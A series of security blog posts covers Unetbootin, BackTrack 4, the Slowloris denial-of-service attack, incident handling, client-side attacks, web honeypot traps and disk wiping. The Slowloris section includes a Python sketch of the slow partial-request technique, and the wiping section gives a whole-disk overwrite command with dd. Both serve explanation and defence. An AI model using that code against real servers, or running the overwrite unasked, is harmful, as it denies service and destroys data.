Live boot CDs have long been a mainstay of security and incident response toolkits. These days CD drives are becoming scarcer, optical media is prone to scratching, and flash media is rapidly getting cheaper. Additionally, flash drives often provide much higher storage capacity for their size.
As a result USB pendrives are starting to overtake CD/DVD in terms of popularity. One stumbling block was often the difficulty of getting the drive to both store the required live filesystem and boot from power-on. For example, my first successful bootable drive (running BackTrack 3) was the result of several days of trial and error.
However, things are now much simpler thanks to the Unetbootin utility. Simply select a supported distribution from the drop-down list (which automates the download of the required media), select an attached USB drive and start the process. The tool then goes off in the background and creates a bootable USB drive, no fuss.
Alternatively you can point the utility at a local *.iso file; whilst not all distributions are officially supported by Unetbootin, I’m yet to have it fail on me.
P.S. the BackTrack 4 Up and Running video series shows the Unetbootin process in all its simplicity.
The Remote-Exploit boys have done it again: a pre-release version of BackTrack 4 is available for download here. As always there is a large amount of documentation available on the Remote-Exploit wiki and forum, and the Offensive-Security blog.
In case you’ve been living under a rock, BackTrack is now based on Ubuntu, which makes the OS easier to install thanks, in part, to the Ubiquity installer. A video demo of the process is included in a series of intro videos designed to get you up and running.
So far I’ve had the latest version run on all my usual hardware; the only issue I still need to resolve (or find someone else’s solution to) is the screen resolution on my AA1. So far the driver and cheat codes used to fix the issue with BT3 don’t have the same effect.
As expected BT4 has the usual assortment of best-of-breed tools, but it seems to have trimmed some of the fat found in previous releases. Whilst some may miss specific tools, I think this helps keep some focus; rather than having multiple tools perform the same task with varying degrees of proficiency, the high-end tools are included to get the job done. I’m sure if anyone’s favourite tools are missing they will be easy enough to add as required.
Customisation appears to have been a focus of the new release, as the process has been made easier and more automated than in previous releases; this article describes the changes with an accompanying video demo.
Not much else to add, BackTrack is still great and moving forward to aid system 0wnage everywhere. Big thanks to Muts and the rest of the Remote Exploit Team.
The attack vector essentially works by initiating an HTTP request but never completing it, causing the handling thread to wait for the end of the request. Slowloris uses multiple threads to rapidly exhaust the web server’s available network resources. The attack is effective against several web server platforms, but most significant in terms of market share and install base are the Apache 1.x and 2.x services.
The HTTP request currently generated by Slowloris is shown below; however, before using this info to create IDS signatures, bear in mind that the packet contents could easily be modified to avoid overly specific signatures (and overly general signatures could generate a high volume of false positives).
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)
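Mechanically the trick is easy to sketch. The following is a hedged Python illustration of the technique, not the Slowloris script itself; the header values are placeholders. Each connection sends its request headers but never the terminating blank line, then periodically sends a bogus extra header to keep the server waiting:

```python
import socket

def partial_request(host):
    # Headers WITHOUT the terminating blank line ("\r\n\r\n"),
    # so the server keeps waiting for the rest of the request.
    return ("GET / HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "User-Agent: Mozilla/4.0 (compatible)\r\n")

def open_slow_connection(host, port=80, timeout=5):
    # Open a socket and send only the partial request; the worker
    # handling it on the server is now tied up waiting for more.
    s = socket.create_connection((host, port), timeout=timeout)
    s.sendall(partial_request(host).encode())
    return s

def keep_alive(sock):
    # Periodically send another bogus header fragment so the server
    # never times the connection out.
    sock.sendall(b"X-a: b\r\n")
```

Because each held connection ties up one worker, a few hundred such sockets can be enough to exhaust the default worker pool of a threaded or pre-forked server.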
Highlighting the potential damage this technique could cause, the Internet Storm Center has already posted two diaries discussing the attack since its release. The first introduces the tool and has some rudimentary low-level analysis of the attack vector. The second discusses potential mitigation techniques; unfortunately these are currently far from bulletproof.
Since its release I’ve tested the Slowloris script and, unfortunately, it’s been wholly effective every time. Whilst the suggested mitigations can improve a web server’s resilience to the attack, as the point of the web server is to provide services to the outside world it is near impossible to prevent a malicious attack of this nature without similarly impacting legitimate service provision. Unfortunately the malicious user has the upper hand in this battle, as the level of resources required to deny service is minuscule compared to the potential damage and the resources required to avoid the threat.
Even against a server modified with some of the proposed mitigations, the attacker still only required a sustained traffic flow of approximately 45Kbps, easily obtainable from even a single ADSL connection. This also means that the attack may be missed by some traditional techniques, such as monitoring for unusual traffic levels, especially as other services on the server will remain responsive. Basically, if you have issues with your web services I’d recommend checking current connections to the Apache service, for example:
# netstat -antp | grep :80
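To make that check more systematic, a short script can tally connections per remote address. This is a sketch assuming the usual Linux `netstat -ant` column layout, with its output fed in as text:

```python
from collections import Counter

def connections_per_source(netstat_output, port=80):
    """Count connections to the given local port, per remote IP.

    Expects lines in the usual Linux `netstat -ant` format, e.g.
    'tcp 0 0 10.0.0.1:80 192.168.1.5:51234 ESTABLISHED'.
    """
    counts = Counter()
    for line in netstat_output.splitlines():
        fields = line.split()
        # Skip headers and non-TCP lines.
        if len(fields) < 5 or not fields[0].startswith("tcp"):
            continue
        local, remote = fields[3], fields[4]
        if local.rsplit(":", 1)[-1] == str(port):
            counts[remote.rsplit(":", 1)[0]] += 1
    return counts
```

A single remote IP holding hundreds of part-open connections to port 80 is a strong hint you are looking at this kind of attack rather than a traffic spike.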
The best response I’ve found so far is reactive: get hit with the attack, find the source IP and block it at the firewall (perimeter or host-based). Not ideal, but at least currently I haven’t seen this attack in the wild to justify modifying functional production servers to mitigate against a potential attack when those modifications could themselves deny legitimate services.
Life could be about to get interesting…
P.S. Twitter plug: whilst this attack vector could be significant, it was publicly available for 48 hours before I noticed any reference in even information-security-focused mainstream media. However, I had a test environment demoing the script within 60 minutes of RSnake (@rsnake) publicising the link on Twitter.
The first is more a question of how to handle security incidents and requirements with minimal resources. This seems to be a common theme, with lots of in-house security teams complaining that resources are too tight and that priority (rightly or wrongly) is given to other business units. The summary of tips provided is too generic for my liking as most should be obvious or common-sense issues, although I’d definitely like some advice on how to actually achieve some of them. For example:
- Set priorities; don’t waste resources on unimportant or inconsequential tasks.
- Get buy in from other business units (especially management)
- Stay calm
- Request assistance if workload is too much
The second article provides more concrete advice on planning for, and managing, security incidents and boils down to three goal markers within an incident handling framework:
- If you don’t have written procedures or steps for handling an incident, then write some.
- Centralised, digital procedures are more useful than paper records, allowing easy access and collaboration by multiple team members, with a specific recommendation of using a wiki.
- Automate as much of your procedures as possible. For example, if one of the procedures is to search web server logs for specific entries, add a button or page to the wiki that automatically searches the specific logs and returns the information. Fewer steps for responders to remember/work through, and less chance of making a mistake when under pressure.
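As a sketch of that kind of automation, the helper below is the sort of one-step log search a wiki page could expose behind a button; the log path and pattern here are illustrative placeholders, not part of any real product:

```python
import re

def search_log(path, pattern):
    """Return log lines matching a regex -- the one-step lookup an
    incident-handling wiki could wire up to a button, so responders
    don't have to remember the grep incantation under pressure."""
    matcher = re.compile(pattern)
    with open(path, encoding="utf-8", errors="replace") as fh:
        return [line.rstrip("\n") for line in fh if matcher.search(line)]
```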
Finally the diary entry makes two points in support of having these systems in place.
- Compliance; logs from wiki-based procedures can prove to auditors that the specified and pre-approved actions were taken during incident X.
- Management; logs and records from past incidents can prove the value of security and incident handling teams within an organisation, or prove SLA compliance with internal and/or external clients.
Psst. You are checking the ISC diary daily aren’t you?
I’ve been meaning to post a quick review of this for a while, but better late than never…
Recorded at Notacon ’09, CG and g0ne gave a great presentation on client-side attacks, video here. The talk starts off by explaining what client-side exploits are and, more importantly, why we should care, and finishes off with some quick and dirty client-side attack examples using Metasploit.
I’ve found this talk really useful and have listened through it on several occasions to get a better feel for the client-side aspect of penetration testing. Client side is an area that has been targeted quite extensively by the ‘bad guys’ and is just starting to get wide-ranging attention from the security industry as a whole.
Throughout the slides, and at the end of the presentation, there are several links to additional reading and sources used for the presentation. Like the presentation itself, I’ve found these to be very informative, providing useful info and techniques with genuine real-world application. Highlights come from Lenny Zeltser and two posts from Carnal 0wnage.
I definitely agree with all those that believe that client side is the next (or current) source of pain for the security industry and that traditional security architecture and tools aren’t currently up to the job of protecting against the threat.
As though client-side attacks weren’t easy enough thanks to the power of Metasploit as demonstrated, I received a link to a blog post priming the world for the release of Assagai, a new phishing framework. If it can live up to the billing, I can’t wait to get my hands on the framework at release.
Johannes Ullrich recently posted an article detailing quick and simple traps you can add to a web site or web app to flag up suspicious and malicious activity on the site. Johannes does a better job of explaining them than I could, so I’d recommend a read of his post, but put simply the traps discussed are:
- Don’t hand session credentials to automated clients
- Add fake admin pages to robots.txt
- Add fake cookies
- Add ‘Spider loops’
- Add fake hidden passwords as HTML comments
- Use ‘hidden’ form fields
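As an example of how little code one of these traps needs, here is a hedged sketch of the ‘hidden’ form field idea: a field (the name below is chosen arbitrarily) that real browsers never display because it is hidden via CSS, so any submission that fills it in was almost certainly automated:

```python
# Hypothetical honeypot field name; in the HTML it would be hidden via CSS
# so a human never sees or fills it.
HONEYPOT_FIELD = "email_confirm"

def looks_automated(form_data):
    """Flag a form submission as suspicious if the honeypot field was filled.

    A legitimate user leaves the invisible field empty; a naive bot that
    fills every field it finds trips the trap.
    """
    return bool(form_data.get(HONEYPOT_FIELD, "").strip())
```

A hit on the trap can then be logged, rate-limited or blocked, depending on how aggressive you want the response to be.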
All of the ideas are relatively simple to implement to a greater or lesser extent. I’ve spent the last week experimenting with some of the proposals and have seen some success so far. If I get any unusual or interesting results I’ll share my findings in a future post.
P.S. if you’re not already following the AppSec Street Fighter blog I’d highly recommend it.
Cleaning the hard drive of any machine, be it desktop, laptop or server, before repurposing, selling or even scrapping it should be a basic requirement for any organisation. But there is a seemingly unrelenting stream of reported incidents, some coming from organisations that really should know better: MI6 and military contractors, for example.
Is securely wiping data from drives really that difficult? Not really.
Simply boot the system with nearly any live Linux system (I use Knoppix for this kind of work), then use dd (discussed previously for imaging drives) to overwrite the drive with random data. For example:
dd if=/dev/urandom of=/dev/sda
This simply overwrites the entire physical drive, sda, with random data taken from the pseudo-device /dev/urandom. For more in-depth info on wiping with dd and some different options, see this guide.
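If you want a quick sanity check that the wipe actually ran to completion, one option is to read back a few blocks spread across the device and flag any that are a single repeated byte (e.g. an untouched zeroed region). This is an illustrative sketch, not a forensic guarantee; it needs root, and the device path is whatever you just wiped:

```python
import os

def sample_is_uniform(data):
    # A block of random data will essentially never be one repeated byte.
    return len(set(data)) <= 1

def spot_check(device, samples=8, block=4096):
    """Read a few blocks spread across the device (e.g. '/dev/sda') and
    return False if any sampled block is suspiciously uniform."""
    fd = os.open(device, os.O_RDONLY)
    try:
        size = os.lseek(fd, 0, os.SEEK_END)
        for i in range(samples):
            os.lseek(fd, (size // samples) * i, os.SEEK_SET)
            if sample_is_uniform(os.read(fd, block)):
                return False
        return True
    finally:
        os.close(fd)
```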
The downside to wiping drives with this method is the length of time involved; in recent cases I have seen an 80GB drive take a little over five hours to complete.
Disclaimer: this may not make your data completely irretrievable, but it should be enough to prevent the data being obtained by the merely curious. To truly ensure data is irretrievable, try this method.
Disclaimer’s Disclaimer: server destruction should only be carried out by trained professionals. InfoSanity accepts no responsibility for loss of life, limb or eyebrow.